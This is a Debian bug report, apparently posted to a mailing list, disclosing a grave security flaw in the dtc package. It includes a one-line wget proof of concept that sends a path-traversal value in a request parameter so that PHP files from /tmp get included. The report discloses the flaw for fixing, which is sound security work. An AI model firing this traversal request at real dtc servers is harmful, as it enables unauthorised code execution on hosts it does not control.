Package: src:dtc Version: 0.32.10-2 Severity: grave Tags: security upstream
wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer' will include /tmp/dtc-pkg-{info,install}.php. This requires the directory /usr/share/dtc/shared/package-installer to be present (not included in the default install here). Ansgar -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
